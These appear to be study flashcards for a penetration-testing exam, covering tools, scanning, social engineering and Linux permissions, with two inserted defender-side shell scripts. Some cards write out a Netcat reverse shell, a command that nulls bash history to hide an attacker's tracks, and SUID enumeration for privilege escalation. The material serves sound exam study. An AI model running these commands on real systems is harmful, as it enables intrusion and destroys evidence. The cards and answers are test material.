Flashcards

1
Q

Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
A. SQL injection
B. VM escape
C. Buffer overflow
D. Cross-site scripting

A

B. VM escape

2
Q

What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?
A. An SOW
B. An NDA
C. An MSA
D. A noncompete

A

B. An NDA

3
Q

Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
A. ZAP
B. Nessus
C. SonarQube
D. OllyDbg

A

A. ZAP

4
Q

Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?
A. PowerShell
B. Bash
C. Ruby
D. Python

A

B. Bash

5
Q

Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
A. Record the details in the penetration testing report.
B. Remediate the vulnerability that allowed her to gain access.
C. Report the potential compromise to the client.
D. No further action is necessary because Renee’s scope of work is limited to penetration testing.

A

C. Report the potential compromise to the client.

6
Q

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
A. Black box
B. Authenticated
C. Internal view
D. External view

A

B. Authenticated

7
Q

Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
A. history -c
B. kill -9 $$
C. echo "" > ~/.bash_history
D. ln /dev/null ~/.bash_history -sf

A

D. ln /dev/null ~/.bash_history -sf
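
The defender's side of card 7, as an added example that is not part of the flashcard set. The check below inspects a home directory and reports the three outcomes the options produce: the file symlinked to /dev/null (option D, the answer, written here as ln -sf /dev/null ... since GNU ln also accepts the trailing-option form in the card), the file blanked with a redirection (option C), or the file missing. Note that history -c (option A) only clears the in-memory list, which the shell still rewrites to the file on exit, so it leaves nothing for this check to see. The home directories it is run against are constructed in a temp dir; readlink is assumed to be available.

```shell
# Added example, not from the flashcard source. Defender-side check for the
# history anti-forensics in card 7: given a home directory, report whether
# ~/.bash_history has been symlinked to /dev/null (the answer's technique),
# blanked with something like echo "" > ~/.bash_history, or removed.
# Returns 0 when the file looks tampered with, 1 when it looks normal.
check_history_tamper() {
    home="$1"
    hist="$home/.bash_history"
    if [ -L "$hist" ]; then
        target=$(readlink "$hist")
        if [ "$target" = "/dev/null" ]; then
            echo "TAMPERED: $hist -> /dev/null (every new command is discarded)"
        else
            echo "SUSPICIOUS: $hist -> $target"
        fi
        return 0
    fi
    if [ ! -e "$hist" ]; then
        echo "SUSPICIOUS: $hist is missing"
        return 0
    fi
    # echo "" > ~/.bash_history leaves a one-byte file (a newline), so test
    # for any non-blank content rather than for a zero-length file.
    if ! grep -q '[^[:space:]]' "$hist"; then
        echo "SUSPICIOUS: $hist is blank (truncated)"
        return 0
    fi
    echo "OK: $hist has $(wc -l < "$hist" | tr -d ' ') line(s)"
    return 1
}

# Exercise the check against three constructed home directories.
demo_history_checks() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/normal" "$tmp/blanked" "$tmp/nulled"
    printf 'ls -la\ncat /etc/passwd\n' > "$tmp/normal/.bash_history"
    echo "" > "$tmp/blanked/.bash_history"          # option C
    ln -sf /dev/null "$tmp/nulled/.bash_history"    # option D, the answer
    for d in normal blanked nulled; do
        check_history_tamper "$tmp/$d" || true
    done
    rm -rf "$tmp"
}

demo_history_checks
```

A symlink to /dev/null is the strongest signal of the three because it has no legitimate reason to exist on an ordinary account; a blank or missing file can also come from a freshly created user, so treat those as leads to correlate with login times and other logs.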

8
Q

Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
A. Nmap
B. Nikto
C. Wireshark
D. CeWL

A

B. Nikto

9
Q

Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
A. OSINT
B. HSI
C. Background
D. None of the above

A

A. OSINT

10
Q

Which of the following activities constitutes a violation of integrity?
A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

A

B. Sensitive or proprietary information was changed or deleted.

11
Q

Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan on each host?

A. 256
B. 1,000
C. 1,024
D. 65,535

A

B. 1,000

12
Q

Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
A. Penetration testing
B. Vulnerability scanning
C. Remediation
D. Threat hunting

A

D. Threat hunting

13
Q

Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

A. Started a reverse shell using Netcat
B. Captured traffic on the Ethernet port to the console via Netcat
C. Set up a bind shell using Netcat
D. None of the above

A

A. Started a reverse shell using Netcat

14
Q

Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

A. A double jump
B. A powerhop
C. Double tagging
D. VLAN squeezing

A

C. Double tagging

15
Q

Alaina wants to conduct an on-path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?
A. ARP spoofing
B. IP proofing
C. DHCP pirating
D. Spoofmastering

A

A. ARP spoofing

16
Q

Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?
A. Authority
B. Scarcity
C. Likeness
D. Social proof

A

D. Social proof

17
Q

Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on-site via the network?
A. Shoulder surfing
B. Kerberoasting
C. USB key drop
D. Quid pro quo

A

C. USB key drop

18
Q

Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file
B. A hashed file
C. A SUID file
D. A SIP file

A

C. A SUID file
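
Decoding the mode string from card 18, as an added example that is not part of the flashcard set. The first column of ls -l packs the special bits into the execute slots: an s in the owner execute position is setuid, an s in the group position is setgid, and a t in the other position is the sticky bit; a capital S or T means the special bit is set without the matching execute bit. The functions below convert such a string to octal and scan an ls -l listing for setuid and setgid files. The listing is constructed for the example; only its first line is the one from the card.

```shell
# Added example, not from the flashcard source. Decodes the mode string that
# ls -l prints into octal (e.g. -rwsr-xr-- -> 4754) and flags the special
# bits. Pure POSIX sh so it runs anywhere ls does.
perm_to_octal() {
    mode="$1"
    special=0
    digits=""
    pos=2                       # skip the file-type character
    for weight in 4 2 1; do     # setuid, setgid, sticky weights per triple
        r=$(printf '%s' "$mode" | cut -c "$pos")
        w=$(printf '%s' "$mode" | cut -c "$((pos + 1))")
        x=$(printf '%s' "$mode" | cut -c "$((pos + 2))")
        v=0
        case "$r" in r) v=$((v + 4)) ;; esac
        case "$w" in w) v=$((v + 2)) ;; esac
        case "$x" in
            x)   v=$((v + 1)) ;;
            s|t) v=$((v + 1)); special=$((special + weight)) ;;
            S|T) special=$((special + weight)) ;;
        esac
        digits="$digits$v"
        pos=$((pos + 3))
    done
    printf '%s%s\n' "$special" "$digits"
}

# Reads ls -l lines on stdin and reports files carrying setuid or setgid.
# Paths containing spaces are not handled; use find -perm for real audits.
flag_special_bits() {
    while read -r mode rest; do
        [ -n "$mode" ] || continue
        oct=$(perm_to_octal "$mode")
        path=$(printf '%s\n' "$rest" | awk '{print $NF}')
        sp=${oct%???}           # leading digit holds the special bits
        case "$sp" in 4|5|6|7) echo "SUID $oct $path" ;; esac
        case "$sp" in 2|3|6|7) echo "SGID $oct $path" ;; esac
    done
}

# Constructed listing; the first line is the one from card 18.
sample_listing() {
    cat <<'EOF'
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture
-rwxr-xr-x 1 root root 35000 Jan 1 2020 /usr/bin/ls
-rwxr-sr-x 1 root shadow 52000 Jan 1 2020 /usr/bin/chage
EOF
}

sample_listing | flag_special_bits
```

Why it matters on an engagement: kismet_capture runs as root for whoever in group kismet executes it, so any argument-handling or file-handling bug in that binary is a local privilege escalation path. On a live system the enumeration is find / -perm -4000 -type f 2>/dev/null for setuid and -perm -2000 for setgid; the decoder above is for reading listings you have already captured.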

19
Q

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?
A. Nmap
B. Traceroute
C. regmon
D. Whois

A

D. Whois

20
Q

Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?
A. Run systemd-detect-virt.
B. Run ls -l /dev/disk/by-id.
C. Run wmic baseboard get manufacturer,product.
D. Run dmidecode to retrieve hardware information.

A

C. Run wmic baseboard get manufacturer,product.